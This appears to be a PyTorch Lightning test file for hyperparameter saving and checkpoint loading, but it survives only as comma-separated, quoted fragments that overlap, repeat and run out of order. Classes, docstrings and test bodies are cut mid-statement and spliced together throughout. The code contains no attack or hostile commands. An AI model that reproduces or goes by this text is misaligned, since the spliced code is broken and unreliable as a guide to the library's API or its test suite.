from torch.utils.data import", "the Apache License, Version 2.0 (the \"License\"); # you may", "# (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def", "== 123 class UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters()", "class UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir):", "raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class", "loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel,", "match=\"__init__\\(\\) got an unexpected keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel):", "__init__(self, *args, subclass_arg=1200, **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass", "= LocalModel(test_arg=14, test_arg2=90) # run standard test suite raw_checkpoint_path =", "super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that has", "# run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel)", "# limitations under the License. import os import pickle from", "super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs): super().__init__() self.hparams =", "# save back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) # verify that", "the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls):", "Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32)", "179 # verify that model loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path)", "_run_standard_hparams_test(tmpdir, model, LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config specific", "\"\"\" Tests that a model can take an object with", "= cls(hparams=Namespace(test_arg=14)) # run standard test suite _run_standard_hparams_test(tmpdir, model, cls)", "= _raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg ==", "== hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class SimpleNoArgsModel(LightningModule): def", "load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel): def __init__(self, my_path,", "hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert", "class LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel()", "# trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model) # #", "== 179 # verify that model loads correctly model =", "dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config): \"\"\"", "pretend EvalModelTemplate did not call self.save_hyperparameters() self.hparams = hparams class", "class SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__() self.l1 = torch.nn.Linear(28 * 28,", "AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init model model = cls(hparams={'test_arg':", "# verify that model loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert", "model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init", "# (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def test_single_config_models(tmpdir, cls, config):", "raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams,", "trainer.fit(model) assert 'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir): hparams =", "under the License is distributed on an \"AS IS\" BASIS,", "assert model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1,", "if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that the", "pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has an attribute", "a = MyModule() _ = a.hparams def test2(self): test_outside() test_outside()", "== 14 assert model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests", "class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that has unconventional names for", "AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): # init model model = cls(hparams=Namespace(test_arg=14))", "[ SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that", "= kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that", "max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make sure the raw checkpoint saved", "saves the arguments passed into the constructor \"\"\" # model", "from fsspec.implementations.local import LocalFileSystem from omegaconf import OmegaConf, Container from", "\"\"\" model = cls(arg1=1, arg2=2) assert 'local_var' not in model.hparams", "assert hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123):", "cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss,", "return {'loss': loss, 'log': {'train_loss': loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(),", "import pickle from argparse import Namespace import cloudpickle import pytest", "= UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1,", "import torch from fsspec.implementations.local import LocalFileSystem from omegaconf import OmegaConf,", "my_path, any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer", "__init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size ==", "# config specific tests assert model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir):", "test_arg2=120) # config specific tests assert model.hparams.test_arg2 == 120 def", "as F from torch.utils.data import DataLoader from pytorch_lightning import Trainer,", "... # make sure PL modules are always nn.Module a", "__init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model = LocalModel(test_arg=14, test_arg2=90)", "has the super().__init__() call at the end. \"\"\" def __init__(self,", "-> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x for x", "def __init__(self, arg1, arg2, *args, **kwargs): super().__init__(*args, **kwargs) self.argument1 =", "because it cannot be pickled\"): trainer.fit(model) assert 'pickle_me' not in", "test_dict_hparams(tmpdir, cls): # init model model = cls(hparams={'test_arg': 14}) #", "-1))) def training_step(self, batch, batch_nb): x, y = batch loss", "the constructor \"\"\" # model = cls(config) # # #", "= -1 assert model.hparams.running_arg == -1 model.hparams = Namespace(abc=42) assert", "hparams and init in the super class \"\"\" def __init__(self,", "ANY KIND, either express or implied. # See the License", "assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 # verify that model loads correctly", "the License. # You may obtain a copy of the", "local_var = 1234 self.save_hyperparameters() # this is intentionally here at", "that the checkpoint saved the correct values trainer = Trainer(default_root_dir=tmpdir,", "* 28, 10) def forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1))) def", "for inheritance: super class takes positional arg, subclass takes varargs.", "# See the License for the specific language governing permissions", "be assigned # assert model.hparams.my_arg == 42 # # #", "test_arg2): super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90) # test proper", "in init.\"\"\" model = cls() trainer = Trainer( max_epochs=1, default_root_dir=tmpdir,", "# test_arg2 is not registered in class init return raw_checkpoint_path", "class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def", "120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a model can take", "**more_kwargs): # intentionally named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel):", "model loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14", "{'train_loss': loss}} def test_step(self, batch, batch_nb): x, y = batch", "= a.hparams class A: def test(self): a = MyModule() _", "This model has the super().__init__() call at the end. \"\"\"", "arguments are collected and not local variables. \"\"\" model =", "EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a model", "def __init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel,", "a model can take implicit args and assign \"\"\" #", "class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs):", "pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs)", "ad = AttributeDict({'key1': 1, 'key2': 'abc'}) pkl = pickle.dumps(ad) assert", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", "-17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1, 'key2': 'abc'}) pkl", "hparams, no other runtime change allowed\"\"\" model = cls(running_arg=123) assert", "model.hparams.batch_size == 32 model = cls(batch_size=179, **extra_args) assert model.hparams.batch_size ==", "writing, software # distributed under the License is distributed on", "model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg == 78 return raw_checkpoint_path", "subclass takes varargs. \"\"\" hparams = dict(test=1) model = SubClassVarArgs(hparams)", "= os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123", "= LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config specific tests assert model.hparams.test_arg2 ==", "overwrite whatever we want raw_checkpoint_path = _raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path,", "*args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel,", "= [x for x in raw_checkpoint_paths if '.ckpt' in x]", "arg 'test_arg=14' \"\"\" hparam_type = type(model.hparams) # test proper property", "License. import os import pickle from argparse import Namespace import", "self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90) # test proper property assignments", "def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we save/export only the initial", "\"\"\"Test models that do not tae any argument in init.\"\"\"", "raw_checkpoint_path # ------------------------- # SPECIFIC TESTS # ------------------------- def test_class_nesting():", "permissions and # limitations under the License. import os import", "'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert", "type. \"\"\" with pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def", "raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): # init model", "= cloudpickle.dumps(ad) assert ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A", "hparams) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) ==", "TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can", "Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make sure the raw checkpoint saved", "torch.nn.Module) def test_outside(): a = MyModule() _ = a.hparams class", "class RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs): super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\",", "TESTS # ------------------------- def test_class_nesting(): class MyModule(LightningModule): def forward(self): ...", "== 14 # verify that model loads correctly model2 =", "LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that only the arguments", "Namespace(abc=42) assert model.hparams.abc == 42 trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2,", "# LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that only the", "that we save/export only the initial hparams, no other runtime", "not in model.hparams # test_arg2 is not registered in class", "has unconventional names for \"self\", \"*args\" and \"**kwargs\". \"\"\" def", "= Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True),", "governing permissions and # limitations under the License. import os", "the checkpoint saved the correct values # trainer = Trainer(default_root_dir=tmpdir,", "assert model.hparams.batch_size == 179 if isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg ==", "'overwritten' local_var = 1234 self.save_hyperparameters() # this is intentionally here", "config specific tests assert model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir): \"\"\"", "42 # # # verify that the checkpoint saved the", "verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) #", "\"\"\" def __init__(self, foo='bar', pickle_me=(lambda x: x + 1), **kwargs):", "_raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg == 42", "assert load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class", "under the License. import os import pickle from argparse import", "== 15 # verify that the checkpoint saved the correct", "past_key): model = EvalModelTemplate() # verify we can train trainer", "a.hparams def test2(self): test_outside() test_outside() A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss", "torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 #", "\"\"\" Test fail on passing unsupported config type. \"\"\" with", "= Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model) # # # verify", "= dict(test=1) model = SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model)", "[SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init model model =", "(AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def test_single_config_models(tmpdir, cls, config): #", "\"\"\" def __init__(self, hparams): super().__init__() self.hparams = hparams # -------------------------", "cls(hparams=conf) assert isinstance(model.hparams, Container) # run standard test suite raw_checkpoint_path", "RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def __init__(self,", "def __init__(obj, *more_args, other_arg=300, **more_kwargs): # intentionally named obj super().__init__(*more_args,", "def test(self): a = MyModule() _ = a.hparams def test2(self):", "os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams))", "*more_args, other_arg=300, **more_kwargs): # intentionally named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters()", "def forward(self): ... # make sure PL modules are always", "]) # def test_single_config_models(tmpdir, cls, config): # \"\"\" Test that", "# # # no matter how you do it, it", "\"\"\" Test for inheritance: super class takes positional arg, subclass", "[ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls,", "removed from hparams because it cannot be pickled\"): trainer.fit(model) assert", "[x for x in raw_checkpoint_paths if '.ckpt' in x] assert", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "**kwargs): self.argument1 = arg1 # arg2 intentionally not set arg1", "assert ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that", "super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size == 15 #", "matter how you do it, it should be assigned #", "= torch.nn.CrossEntropyLoss() def __init__(self, *args, subclass_arg=1200, **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters()", "model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14 assert isinstance(model2.hparams, hparam_type)", "model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd'))", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "limitations under the License. import os import pickle from argparse", "'log': {'train_loss': loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [", "== 14 assert 'test_arg2' not in model.hparams # test_arg2 is", "max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert", "model = cls(hparams=Namespace(test_arg=14)) # run standard test suite _run_standard_hparams_test(tmpdir, model,", "== 179 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if isinstance(model,", "correct values # trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model)", "model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179 if isinstance(model, AggSubClassEvalModel):", "\"\"\" extra_args = {} if cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "not in model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here',", "take an object \"\"\" def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class", "# # verify that model loads correctly # raw_checkpoint_path =", "# verify that we can overwrite whatever we want model", "UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model", "isinstance(model.hparams, Container) # run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir,", "test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1, 'key2': 'abc'}) pkl = pickle.dumps(ad)", "try_overwrite: # verify that we can overwrite the property model3", "# verify that the checkpoint saved the correct values #", "(OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config): \"\"\" Test", "class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def", "AttributeDict({'key1': 1, 'key2': 'abc'}) pkl = pickle.dumps(ad) assert ad ==", "the model automatically saves the arguments passed into the constructor", "init model model = cls(hparams={'test_arg': 14}) # run standard test", "self.argument1 = arg1 # arg2 intentionally not set arg1 =", "the end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has the _auto_collect_arguments()", "model that has unconventional names for \"self\", \"*args\" and \"**kwargs\".", "super class \"\"\" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def", "hparams = dict(test=1) model = SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)", "__init__(self, hparams): super().__init__() self.hparams = hparams # ------------------------- # STANDARD", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters() model", "== 14 # verify that model loads correctly model =", "self.l1 = torch.nn.Linear(28 * 28, 10) def forward(self, x): return", "we can overwrite whatever we want raw_checkpoint_path = _raw_checkpoint_path(trainer) model", "correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg == 14 assert", "model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__() self._hparams = None", "# ------------------------- # SPECIFIC TESTS # ------------------------- def test_class_nesting(): class", "implicit args and assign \"\"\" # define model class LocalModel(EvalModelTemplate):", "hparams # ------------------------- # STANDARD TESTS # ------------------------- def _run_standard_hparams_test(tmpdir,", "\"\"\" hparams = dict(test=1) model = SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir,", "test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir,", "specific language governing permissions and # limitations under the License.", "120 def test_implicit_args_hparams(tmpdir): \"\"\" Tests that a model can take", "UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls): \"\"\" Test that the", "= SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer)", "SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__() self._hparams = None # pretend", "super().__init__() call at the end. \"\"\" def __init__(self, arg1, arg2,", "arg, subclass takes varargs. \"\"\" hparams = dict(test=1) model =", "def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that do not tae any", "*args, **kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test for inheritance:", "loss}} def test_step(self, batch, batch_nb): x, y = batch loss", "model model = cls(hparams={'test_arg': 14}) # run standard test suite", "LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg == 14 assert 'test_arg2' not in", "property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg == 78 return", "omegaconf import OmegaConf, Container from torch.nn import functional as F", "load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class SimpleNoArgsModel(LightningModule):", "# you may not use this file except in compliance", "@pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): # init model model", "__init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test for", "__init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) #", "passed into the constructor \"\"\" # model = cls(config) #", "super class takes positional arg, subclass takes varargs. \"\"\" hparams", "assert 'test_arg2' not in model.hparams # test_arg2 is not registered", "assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything' # verify that", "self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir, max_steps=1)", "can overwrite the property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg", "if isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything'", "# trainer.fit(model) # # # verify that model loads correctly", "the _auto_collect_arguments() call at the end. \"\"\" def __init__(self, arg1,", "\"\"\" # define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2):", "batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size == 15", "SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with", "raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path", "pytorch_lightning import Trainer, LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml from", "x): return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch, batch_nb): x, y", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "model can take regular args and assign \"\"\" # define", "from hparams because it cannot be pickled\"): trainer.fit(model) assert 'pickle_me'", "Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) ==", "\"\"\" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\"", "kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we", "def test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2,", "trainer.fit(model) # make sure the raw checkpoint saved the properties", "\"\"\" Tests for the existence of an arg 'test_arg=14' \"\"\"", "of an arg 'test_arg=14' \"\"\" hparam_type = type(model.hparams) # test", "model has the _auto_collect_arguments() call at the end. \"\"\" def", "limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams", "batch_nb): x, y = batch loss = F.cross_entropy(self(x), y) return", "arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel,", "cannot be pickled. \"\"\" def __init__(self, foo='bar', pickle_me=(lambda x: x", "trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in", "saved the correct values # trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)", "def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model takes only valid class", "under the Apache License, Version 2.0 (the \"License\"); # you", "tests.base import EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that", "model can take an object \"\"\" def __init__(self, hparams): super().__init__()", "# @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)), #", "__init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90) #", "super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls):", "ad == pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert ad == pickle.loads(pkl)", "extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert model.hparams.batch_size == 32 model =", "LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has the super().__init__() call at the", "== 42 trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1,", "end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has the _auto_collect_arguments() call", "hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123): super().__init__()", "# init model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model", "assert model2.hparams.test_arg == 14 assert isinstance(model2.hparams, hparam_type) if try_overwrite: #", "\"\"\" Tests that a model can take regular args and", "pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class", "arg1, arg2, *args, **kwargs): self.argument1 = arg1 # arg2 intentionally", "raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type']", "ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has", "pickled\"): trainer.fit(model) assert 'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir): hparams", "assert model.hparams.subclass_arg == 1200 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss)", "*args, **kwargs): super().__init__(*args, **kwargs) self.argument1 = arg1 # arg2 intentionally", "correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path) #", "we can overwrite the property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert", "hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model should accept hparams", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "if isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg == 1200 if 